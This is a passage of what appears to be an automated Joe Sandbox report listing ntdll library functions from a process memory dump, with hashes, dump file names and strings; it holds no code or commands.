                                                                                      • Snapshot File: hcaresult_5_2_3160000_replace.jbxd
                                                                                      Similarity
                                                                                      • API ID: InitializeThunk
                                                                                      • String ID:
                                                                                      • API String ID: 2994545307-0
                                                                                      • Opcode ID: ce98c26bb034806eacbec305b06f686f12d1d4d503642377dbdc0e1f06c8bcd5
                                                                                      • Instruction ID: a3bf62f55b6bd452146dfef60fcb90e7e840930dc897198424ae9051227b9188
                                                                                      • Opcode Fuzzy Hash: ce98c26bb034806eacbec305b06f686f12d1d4d503642377dbdc0e1f06c8bcd5
                                                                                      • Instruction Fuzzy Hash: 2B900435311C0403010DF55C07045070047C7DD751355D031F1017550CD733CD715131
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Function 031D2AF0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                                      Download Yara Rule

                                                                                      Control-flow Graph

                                                                                      • Executed
                                                                                      • Not Executed
                                                                                      control_flow_graph 5 31d2af0-31d2afc LdrInitializeThunk
                                                                                      APIs
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000005.00000002.2176003269.0000000003160000.00000040.00001000.00020000.00000000.sdmp, Offset: 03160000, based on PE: true
                                                                                      • Associated: 00000005.00000002.2176003269.0000000003289000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.2176003269.000000000328D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.2176003269.00000000032FE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_5_2_3160000_replace.jbxd
                                                                                      Similarity
                                                                                      • API ID: InitializeThunk
                                                                                      • String ID:
                                                                                      • API String ID: 2994545307-0
                                                                                      • Opcode ID: bcc652ef63fd5fb355f325c93965c827113f0df9b000a56a1c82fc1cb10cdc9f
                                                                                      • Instruction ID: d0a0490889babb543d6a479968d5b6338d655e256c51e332fea0306a0e2488cd
                                                                                      • Opcode Fuzzy Hash: bcc652ef63fd5fb355f325c93965c827113f0df9b000a56a1c82fc1cb10cdc9f
                                                                                      • Instruction Fuzzy Hash: 11900225221804030149F558070450B044597DA751395D015F1417590CC72289655321
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Function 031D2F30 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMONLIBRARYCODE
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000005.00000002.2176003269.0000000003160000.00000040.00001000.00020000.00000000.sdmp, Offset: 03160000, based on PE: true
                                                                                      • Associated: 00000005.00000002.2176003269.0000000003289000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.2176003269.000000000328D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.2176003269.00000000032FE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_5_2_3160000_replace.jbxd
                                                                                      Similarity
                                                                                      • API ID: InitializeThunk
                                                                                      • String ID:
                                                                                      • API String ID: 2994545307-0
                                                                                      • Opcode ID: ad6c8f3448c676b904baa4dc0feb353d3423d3e64e6dc431d0f121283e1f4475
                                                                                      • Instruction ID: 4cbbe993c7a0077781106531c9a9897c4ea17a588e69793899a7717707800e0e
                                                                                      • Opcode Fuzzy Hash: ad6c8f3448c676b904baa4dc0feb353d3423d3e64e6dc431d0f121283e1f4475
                                                                                      • Instruction Fuzzy Hash: DD90026134180843D104B1584514B060005C7E5701F55D015E1065554D871ACD526126
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Function 031D2FB0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000005.00000002.2176003269.0000000003160000.00000040.00001000.00020000.00000000.sdmp, Offset: 03160000, based on PE: true
                                                                                      • Associated: 00000005.00000002.2176003269.0000000003289000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.2176003269.000000000328D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.2176003269.00000000032FE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_5_2_3160000_replace.jbxd
                                                                                      Similarity
                                                                                      • API ID: InitializeThunk
                                                                                      • String ID:
                                                                                      • API String ID: 2994545307-0
                                                                                      • Opcode ID: e831d71eff7b1468f8502effa1aa94c68b22333f68fdb7db7eb5f109efa11173
                                                                                      • Instruction ID: 9ec5e9b26d7c2038dcf86520956d5f998cbb815199630204263ca2110021ff96
                                                                                      • Opcode Fuzzy Hash: e831d71eff7b1468f8502effa1aa94c68b22333f68fdb7db7eb5f109efa11173
                                                                                      • Instruction Fuzzy Hash: 42900221601804434144B16889449064005ABE5611755D121A0999550D875A89655665
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Function 031D2FE0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000005.00000002.2176003269.0000000003160000.00000040.00001000.00020000.00000000.sdmp, Offset: 03160000, based on PE: true
                                                                                      • Associated: 00000005.00000002.2176003269.0000000003289000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.2176003269.000000000328D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.2176003269.00000000032FE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_5_2_3160000_replace.jbxd
                                                                                      Similarity
                                                                                      • API ID: InitializeThunk
                                                                                      • String ID:
                                                                                      • API String ID: 2994545307-0
                                                                                      • Opcode ID: 393ed5c2a52aa5e6e134bea70566524df962e42d21f3ec2709e8cca9f2c13da3
                                                                                      • Instruction ID: 3b558277d715a7d3bd22ec889b697d3eb2ebe74f45de585988536bfc94dd8190
                                                                                      • Opcode Fuzzy Hash: 393ed5c2a52aa5e6e134bea70566524df962e42d21f3ec2709e8cca9f2c13da3
                                                                                      • Instruction Fuzzy Hash: 00900221211C0443D204B5684D14B07000587D4703F55D115A0155554CCB1689615521
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Function 031D2E80 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                                      Download Yara Rule

                                                                                      Control-flow Graph

                                                                                      • Executed
                                                                                      • Not Executed
                                                                                      control_flow_graph 17 31d2e80-31d2e8c LdrInitializeThunk
                                                                                      APIs
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000005.00000002.2176003269.0000000003160000.00000040.00001000.00020000.00000000.sdmp, Offset: 03160000, based on PE: true
                                                                                      • Associated: 00000005.00000002.2176003269.0000000003289000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.2176003269.000000000328D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.2176003269.00000000032FE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_5_2_3160000_replace.jbxd
                                                                                      Similarity
                                                                                      • API ID: InitializeThunk
                                                                                      • String ID:
                                                                                      • API String ID: 2994545307-0
                                                                                      • Opcode ID: a9af7557d3c00d2883684051a3acf0eb6737659895cb0df68520ad80a6988b0d
                                                                                      • Instruction ID: 4322f083587ca7e263fd9dbd06853270cdc16840cb86d2a7029bc46ad92c60b7
                                                                                      • Opcode Fuzzy Hash: a9af7557d3c00d2883684051a3acf0eb6737659895cb0df68520ad80a6988b0d
                                                                                      • Instruction Fuzzy Hash: AD90022160180903D105B1584504616000A87D4641F95D022A1025555ECB268A92A131
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Function 031D2EE0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000005.00000002.2176003269.0000000003160000.00000040.00001000.00020000.00000000.sdmp, Offset: 03160000, based on PE: true
                                                                                      • Associated: 00000005.00000002.2176003269.0000000003289000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.2176003269.000000000328D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.2176003269.00000000032FE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_5_2_3160000_replace.jbxd
                                                                                      Similarity
                                                                                      • API ID: InitializeThunk
                                                                                      • String ID:
                                                                                      • API String ID: 2994545307-0
                                                                                      • Opcode ID: 67718aec50b472001d249e41515a592ad278bcc363435035a6a7ddd4267a4ddd
                                                                                      • Instruction ID: 448fb4461873297abbce62fb04fa9663fe237b27eda2032a1d239e312509b951
                                                                                      • Opcode Fuzzy Hash: 67718aec50b472001d249e41515a592ad278bcc363435035a6a7ddd4267a4ddd
                                                                                      • Instruction Fuzzy Hash: 0C900261201C0803D144B5584904607000587D4702F55D011A2065555E8B2A8D516135
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Function 031D2D10 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMONLIBRARYCODE
                                                                                      Download Yara Rule

                                                                                      Control-flow Graph

                                                                                      • Executed
                                                                                      • Not Executed
                                                                                      control_flow_graph 13 31d2d10-31d2d1c LdrInitializeThunk
                                                                                      APIs
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000005.00000002.2176003269.0000000003160000.00000040.00001000.00020000.00000000.sdmp, Offset: 03160000, based on PE: true
                                                                                      • Associated: 00000005.00000002.2176003269.0000000003289000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.2176003269.000000000328D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.2176003269.00000000032FE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_5_2_3160000_replace.jbxd
                                                                                      Similarity
                                                                                      • API ID: InitializeThunk
                                                                                      • String ID:
                                                                                      • API String ID: 2994545307-0
                                                                                      • Opcode ID: b41ece1b171a4f7179af90905bb671bc78d0281b34be184adf74c3e8fc7f22c4
                                                                                      • Instruction ID: 08d74ea5aa4ee914bb66bf2d776a735d8ac3e1eb52bd0b25c81b4dd9abd39b33
                                                                                      • Opcode Fuzzy Hash: b41ece1b171a4f7179af90905bb671bc78d0281b34be184adf74c3e8fc7f22c4
                                                                                      • Instruction Fuzzy Hash: 2090022921380403D184B158550860A000587D5602F95E415A0016558CCB1689695321
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Function 031D2D30 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMONLIBRARYCODE
                                                                                      Download Yara Rule

                                                                                      Control-flow Graph

                                                                                      • Executed
                                                                                      • Not Executed
                                                                                      control_flow_graph 14 31d2d30-31d2d3c LdrInitializeThunk
                                                                                      APIs
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000005.00000002.2176003269.0000000003160000.00000040.00001000.00020000.00000000.sdmp, Offset: 03160000, based on PE: true
                                                                                      • Associated: 00000005.00000002.2176003269.0000000003289000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.2176003269.000000000328D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.2176003269.00000000032FE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_5_2_3160000_replace.jbxd
                                                                                      Similarity
                                                                                      • API ID: InitializeThunk
                                                                                      • String ID:
                                                                                      • API String ID: 2994545307-0
                                                                                      • Opcode ID: 41a98d910681bc070fd7a9473af5879e09598b724bd2857fda4e82b5688e2e31
                                                                                      • Instruction ID: 1d6be6f881577b58657fee55b370efd2b4f04aad8d6833d880dcd20efda069a5
                                                                                      • Opcode Fuzzy Hash: 41a98d910681bc070fd7a9473af5879e09598b724bd2857fda4e82b5688e2e31
                                                                                      • Instruction Fuzzy Hash: 2290022130180403D144B15855186064005D7E5701F55E011E0415554CDB1689565222
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Function 031D2DD0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                                      Download Yara Rule

                                                                                      Control-flow Graph

                                                                                      • Executed
                                                                                      • Not Executed
                                                                                      control_flow_graph 15 31d2dd0-31d2ddc LdrInitializeThunk
                                                                                      APIs
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000005.00000002.2176003269.0000000003160000.00000040.00001000.00020000.00000000.sdmp, Offset: 03160000, based on PE: true
                                                                                      • Associated: 00000005.00000002.2176003269.0000000003289000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.2176003269.000000000328D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.2176003269.00000000032FE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_5_2_3160000_replace.jbxd
                                                                                      Similarity
                                                                                      • API ID: InitializeThunk
                                                                                      • String ID:
                                                                                      • API String ID: 2994545307-0
                                                                                      • Opcode ID: 1aa1a63a2abaabb4e1e9c12c2ef604fb8515d4391a526d55c5fd9e3e3a6921fa
                                                                                      • Instruction ID: d5b059ab8823b0c47fbe6b6c8f6e9c75dc477de2a5063ec0b4a0ba7d330668c5
                                                                                      • Opcode Fuzzy Hash: 1aa1a63a2abaabb4e1e9c12c2ef604fb8515d4391a526d55c5fd9e3e3a6921fa
                                                                                      • Instruction Fuzzy Hash: 1E900221242845535549F1584504507400697E4641795D012A1415950C87279956D621
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Function 031D2DF0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMONLIBRARYCODE
                                                                                      Download Yara Rule

                                                                                      Control-flow Graph

                                                                                      • Executed
                                                                                      • Not Executed
                                                                                      control_flow_graph 16 31d2df0-31d2dfc LdrInitializeThunk
                                                                                      APIs
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000005.00000002.2176003269.0000000003160000.00000040.00001000.00020000.00000000.sdmp, Offset: 03160000, based on PE: true
                                                                                      • Associated: 00000005.00000002.2176003269.0000000003289000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.2176003269.000000000328D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.2176003269.00000000032FE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_5_2_3160000_replace.jbxd
                                                                                      Similarity
                                                                                      • API ID: InitializeThunk
                                                                                      • String ID:
                                                                                      • API String ID: 2994545307-0
                                                                                      • Opcode ID: 328590cec20eea04cb506733ca2e2c2f2f87e9264b559aa99a6660f0346d0a25
                                                                                      • Instruction ID: 57acc7bdc75403b526ae999df4dc7f994bd743a139b0ddf596870d8cd8cd1424
                                                                                      • Opcode Fuzzy Hash: 328590cec20eea04cb506733ca2e2c2f2f87e9264b559aa99a6660f0346d0a25
                                                                                      • Instruction Fuzzy Hash: 3B90023120180813D115B1584604707000987D4641F95D412A0425558D97578A52A121
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Function 031D2C70 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMONLIBRARYCODE
                                                                                      Download Yara Rule

                                                                                      Control-flow Graph

                                                                                      • Executed
                                                                                      • Not Executed
                                                                                      control_flow_graph 11 31d2c70-31d2c7c LdrInitializeThunk
                                                                                      APIs
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000005.00000002.2176003269.0000000003160000.00000040.00001000.00020000.00000000.sdmp, Offset: 03160000, based on PE: true
                                                                                      • Associated: 00000005.00000002.2176003269.0000000003289000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.2176003269.000000000328D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.2176003269.00000000032FE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_5_2_3160000_replace.jbxd
                                                                                      Similarity
                                                                                      • API ID: InitializeThunk
                                                                                      • String ID:
                                                                                      • API String ID: 2994545307-0
                                                                                      • Opcode ID: 216b38be99530de67ce56af334e25a51aca21746cb704a8a8058c2d31b802a16
                                                                                      • Instruction ID: 484e3f84f130a6e2537cbf0f04b743dfa7b3784918a298c65b36ba0a896a03f4
                                                                                      • Opcode Fuzzy Hash: 216b38be99530de67ce56af334e25a51aca21746cb704a8a8058c2d31b802a16
                                                                                      • Instruction Fuzzy Hash: 3C90023120188C03D114B158850474A000587D4701F59D411A4425658D879689917121
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Function 031D2C60 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                                      Download Yara Rule

                                                                                      Control-flow Graph

                                                                                      • Executed
                                                                                      • Not Executed
                                                                                      control_flow_graph 10 31d2c60-31d2c6c LdrInitializeThunk
                                                                                      APIs
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000005.00000002.2176003269.0000000003160000.00000040.00001000.00020000.00000000.sdmp, Offset: 03160000, based on PE: true
                                                                                      • Associated: 00000005.00000002.2176003269.0000000003289000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.2176003269.000000000328D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.2176003269.00000000032FE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_5_2_3160000_replace.jbxd
                                                                                      Similarity
                                                                                      • API ID: InitializeThunk
                                                                                      • String ID:
                                                                                      • API String ID: 2994545307-0
                                                                                      • Opcode ID: e920c026e7868087f6edff319702a4de242a422ab3376a44c5d41299645ce0a4
                                                                                      • Instruction ID: 090354a28c9dffe3941f39f1aee9703fa7aaf87be8112a314202c9bb311ddef1
                                                                                      • Opcode Fuzzy Hash: e920c026e7868087f6edff319702a4de242a422ab3376a44c5d41299645ce0a4
                                                                                      • Instruction Fuzzy Hash: DF90023120180C43D104B1584504B46000587E4701F55D016A0125654D8716C9517521
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Function 031D2CA0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                                      Download Yara Rule

                                                                                      Control-flow Graph

                                                                                      • Executed
                                                                                      • Not Executed
                                                                                      control_flow_graph 12 31d2ca0-31d2cac LdrInitializeThunk
                                                                                      APIs
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000005.00000002.2176003269.0000000003160000.00000040.00001000.00020000.00000000.sdmp, Offset: 03160000, based on PE: true
                                                                                      • Associated: 00000005.00000002.2176003269.0000000003289000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.2176003269.000000000328D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.2176003269.00000000032FE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_5_2_3160000_replace.jbxd
                                                                                      Similarity
                                                                                      • API ID: InitializeThunk
                                                                                      • String ID:
                                                                                      • API String ID: 2994545307-0
                                                                                      • Opcode ID: 88896a45e68346fbc62f2ecc5140e9f6821e890f0e52e3bf64f25e7f808f2c2b
                                                                                      • Instruction ID: 6c1bc5d287457dfec1785702f69b51632eff13ff601256d6576cfbe4255f8930
                                                                                      • Opcode Fuzzy Hash: 88896a45e68346fbc62f2ecc5140e9f6821e890f0e52e3bf64f25e7f808f2c2b
                                                                                      • Instruction Fuzzy Hash: 0490023120180803D104B5985508646000587E4701F55E011A5025555EC76689916131
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Function 031D35C0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000005.00000002.2176003269.0000000003160000.00000040.00001000.00020000.00000000.sdmp, Offset: 03160000, based on PE: true
                                                                                      • Associated: 00000005.00000002.2176003269.0000000003289000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.2176003269.000000000328D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.2176003269.00000000032FE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_5_2_3160000_replace.jbxd
                                                                                      Similarity
                                                                                      • API ID: InitializeThunk
                                                                                      • String ID:
                                                                                      • API String ID: 2994545307-0
                                                                                      • Opcode ID: 8a266f2748304f3e0f32836d21762705f08ff2d1ffc12d13226869ff8d6b4673
                                                                                      • Instruction ID: d66a03258bfc2093e265cc569defb09514af33c2e88bab33211f9d3036ee27d8
                                                                                      • Opcode Fuzzy Hash: 8a266f2748304f3e0f32836d21762705f08ff2d1ffc12d13226869ff8d6b4673
                                                                                      • Instruction Fuzzy Hash: E990023160590803D104B1584614706100587D4601F65D411A0425568D87968A5165A2
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Function 031D39B0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000005.00000002.2176003269.0000000003160000.00000040.00001000.00020000.00000000.sdmp, Offset: 03160000, based on PE: true
                                                                                      • Associated: 00000005.00000002.2176003269.0000000003289000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.2176003269.000000000328D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.2176003269.00000000032FE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_5_2_3160000_replace.jbxd
                                                                                      Similarity
                                                                                      • API ID: InitializeThunk
                                                                                      • String ID:
                                                                                      • API String ID: 2994545307-0
                                                                                      • Opcode ID: f5b0464008921b7ce906a5f5c75870a3cc01dc72d9d1201b1634c7da13578f0e
                                                                                      • Instruction ID: f4836a5573d8a0627e0bd09f064908733d7ef83cf0e21d65350424bc30b6982e
                                                                                      • Opcode Fuzzy Hash: f5b0464008921b7ce906a5f5c75870a3cc01dc72d9d1201b1634c7da13578f0e
                                                                                      • Instruction Fuzzy Hash: 0790022124585503D154B15C45046164005A7E4601F55D021A0815594D875689556221
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Function 031D2C0A Relevance: 1.5, APIs: 1, Instructions: 8libraryCOMMONLIBRARYCODE
                                                                                      Download Yara Rule

                                                                                      Control-flow Graph

                                                                                      • Executed
                                                                                      • Not Executed
                                                                                      control_flow_graph 0 31d2c0a-31d2c0f 1 31d2c1f-31d2c26 LdrInitializeThunk 0->1 2 31d2c11-31d2c18 0->2
                                                                                      APIs
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000005.00000002.2176003269.0000000003160000.00000040.00001000.00020000.00000000.sdmp, Offset: 03160000, based on PE: true
                                                                                      • Associated: 00000005.00000002.2176003269.0000000003289000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.2176003269.000000000328D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.2176003269.00000000032FE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_5_2_3160000_replace.jbxd
                                                                                      Similarity
                                                                                      • API ID: InitializeThunk
                                                                                      • String ID:
                                                                                      • API String ID: 2994545307-0
                                                                                      • Opcode ID: a0fb89806f683d1eb8a96087555528e3ba9d98c45cb40c9b58e538ab1d25e306
                                                                                      • Instruction ID: ef8d444652e5178c3827649d44e8ecf3a355aa62d2a0d6aff787b2da276006d0
                                                                                      • Opcode Fuzzy Hash: a0fb89806f683d1eb8a96087555528e3ba9d98c45cb40c9b58e538ab1d25e306
                                                                                      • Instruction Fuzzy Hash: 74B09B719019C5C7DA15E7604708717790467D5701F29C561D2130641E4739C5D1E175
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Function 02A8D02C Relevance: .0, Instructions: 5COMMON
                                                                                      Download Yara Rule
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000005.00000002.2175034709.0000000002A70000.00000040.80000000.00040000.00000000.sdmp, Offset: 02A70000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_5_2_2a70000_replace.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: e08a6fec3f22353474cc37b2baeea1cbfae0555b918335b34bda9e4e4c23f8c4
                                                                                      • Instruction ID: ebbc7e38d39232aa8072abc3049c7a46807266884709e59069fdef6a771d3880
                                                                                      • Opcode Fuzzy Hash: e08a6fec3f22353474cc37b2baeea1cbfae0555b918335b34bda9e4e4c23f8c4
                                                                                      • Instruction Fuzzy Hash:
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Non-executed Functions

                                                                                      Function 031D2890 Relevance: 17.7, APIs: 6, Strings: 4, Instructions: 190COMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000005.00000002.2176003269.0000000003160000.00000040.00001000.00020000.00000000.sdmp, Offset: 03160000, based on PE: true
                                                                                      • Associated: 00000005.00000002.2176003269.0000000003289000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.2176003269.000000000328D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.2176003269.00000000032FE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_5_2_3160000_replace.jbxd
                                                                                      Similarity
                                                                                      • API ID: ___swprintf_l
                                                                                      • String ID: :%u.%u.%u.%u$::%hs%u.%u.%u.%u$::ffff:0:%u.%u.%u.%u$ffff:
                                                                                      • API String ID: 48624451-2108815105
                                                                                      • Opcode ID: 315ea817e17bd11d21384d9b16ca13cf80174533f9dc670a66cd22f20f279e05
                                                                                      • Instruction ID: e6347a103b5e0fe8299d1988bd504311fe3f2475f92ad6ea62972d8e8a9192f4
                                                                                      • Opcode Fuzzy Hash: 315ea817e17bd11d21384d9b16ca13cf80174533f9dc670a66cd22f20f279e05
                                                                                      • Instruction Fuzzy Hash: 465127B6A00216BFCB24DB98C88097EFBF8BB0D2017548569E475D7641D374DE558BA0
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Function 03242410 Relevance: 17.7, APIs: 6, Strings: 4, Instructions: 189COMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000005.00000002.2176003269.0000000003160000.00000040.00001000.00020000.00000000.sdmp, Offset: 03160000, based on PE: true
                                                                                      • Associated: 00000005.00000002.2176003269.0000000003289000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.2176003269.000000000328D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.2176003269.00000000032FE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_5_2_3160000_replace.jbxd
                                                                                      Similarity
                                                                                      • API ID: ___swprintf_l
                                                                                      • String ID: :%u.%u.%u.%u$::%hs%u.%u.%u.%u$::ffff:0:%u.%u.%u.%u$ffff:
                                                                                      • API String ID: 48624451-2108815105
                                                                                      • Opcode ID: ce6bcc86342e1b16b4fbb398ae4be96ab16203c825a64b4bb29de58b0a8ae4e0
                                                                                      • Instruction ID: f0d42c091ddcb8d257e2f34d246451f664633130b9361129264f55f671532a85
                                                                                      • Opcode Fuzzy Hash: ce6bcc86342e1b16b4fbb398ae4be96ab16203c825a64b4bb29de58b0a8ae4e0
                                                                                      • Instruction Fuzzy Hash: 9B51B569A10746AFCB28DB9EC89097FB7F9DF48201B088C59F4A5D7641D7B4DA808B60
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Function 031C7630 Relevance: 14.2, APIs: 1, Strings: 7, Instructions: 194COMMON
                                                                                      Download Yara Rule
                                                                                      Strings
                                                                                      • CLIENT(ntdll): Found Execute=1, turning off execution protection for the process because of %wZ, xrefs: 03204725
                                                                                      • ExecuteOptions, xrefs: 032046A0
